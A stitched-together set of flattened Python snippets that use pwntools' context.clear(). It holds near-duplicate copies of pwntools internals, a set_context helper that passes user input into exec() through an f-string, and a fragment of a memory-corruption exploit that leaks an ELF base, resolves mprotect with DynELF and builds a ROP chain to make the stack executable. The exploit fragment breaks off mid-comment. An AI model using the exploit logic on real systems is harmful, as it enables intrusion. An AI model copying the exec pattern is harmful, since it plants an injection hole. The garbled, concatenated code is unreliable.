def __do_deferred_initialization(self): if self._initialized: return with context.local(device=self.serial): abi = getprop('ro.product.cpu.abi') context.clear() context.arch = str(abi) self._arch = context.arch self._bits = context.bits self._endian = context.endian if self.port == 'emulator': emulator, port = self.serial.split('-') port = int(port) try: with remote('localhost', port, level='error') as r: r.recvuntil('OK') r.recvline() # Rest of the line r.sendline('avd name') self.avd = r.recvline().strip() except: pass self._initialized = True
def __do_deferred_initialization(self): if self._initialized: return with context.local(device=self.serial): abi = str(properties.ro.product.cpu.abi) context.clear() context.arch = str(abi) self._arch = context.arch self._bits = context.bits self._endian = context.endian if self.port == 'emulator': emulator, port = self.serial.split('-') port = int(port) try: with remote('localhost', port, level='error') as r: r.recvuntil('OK') r.recvline() # Rest of the line r.sendline('avd name') self.avd = r.recvline().strip() except: pass self._initialized = True
def set_context(self, **kwargs): context.clear() try: self.__encoding = kwargs['encoding'] print(f"[+] Encoding => {self.__encoding}") del kwargs['encoding'] except KeyError: print("[*] No valid encoding provided: defaulting to ASCII") self.__encoding = 'ascii' try: for key, value in kwargs.items(): exec(f"context.{key} = '{value}'") except (KeyError, SyntaxError) as context_err: print(f"[-] Unable to set value: {context_err}\n") raise ValueError("Please provide a valid key/value pair.\n") print(f"[+] Context => {vars(context)}\n")
def _run_handlers(): """_run_handlers() Run registered handlers. They run in the reverse order of which they were registered. If a handler raises an exception, it will be printed but nothing else happens, i.e. other handlers will be run. """ for _ident, (func, args, kwargs, ctx) in \ sorted(_handlers.items(), reverse = True): try: with context.local(): context.clear() context.update(**ctx) func(*args, **kwargs) except SystemExit: pass except Exception: # extract the current exception and rewind the traceback to where it # originated typ, val, tb = sys.exc_info() traceback.print_exception(typ, val, tb.tb_next)
def _run_handlers(): """_run_handlers() Run registered exit-handlers. They run in the reverse order of which they were registered. If a handler raises an exception, it will be printed but nothing else happens, i.e. other handlers will be run and `sys.excepthook` will not be called for that reason. """ context.clear() for _ident, (func, args, kwargs, ctx) in \ sorted(_handlers.items(), reverse = True): try: with context.local(**ctx): func(*args, **kwargs) except SystemExit: pass except Exception: # extract the current exception and rewind the traceback to where it # originated typ, val, tb = sys.exc_info() traceback.print_exception(typ, val, tb.tb_next)
page_prefix = a_read(s, epp_ba, 4) if page_prefix == bytes('\x7fELF', 'utf8'): logging.info( "epp base address: 0x{:X}".format(epp_ba)) break epp_ba -= 0x1000 def leak(address): return a_read(s, address, 8) epp_dyn_elf = DynELF(leak, epp_ba) libc_mprotect = epp_dyn_elf.lookup('mprotect', 'libc') context.clear(arch='amd64') binary = ELF(epp_path) binary.address = epp_ba binary.symbols = {'mprotect': libc_mprotect} rop = ROP(binary) # Mark the current stack page, and the one just before, incase we are on a boundary. rop.call( 'mprotect', (stack_frame.previous_frame_stack_base_pointer & ~0xFFF, 0x2000, 0x7)) target_ip = socket.gethostbyname(socket.gethostname()) mprotect_rop = rop.chain() logging.info(rop.dump()) # We are gonna be a little lazy and just end with an infinite loop, # we make no attempt to clean up the stack and continue normal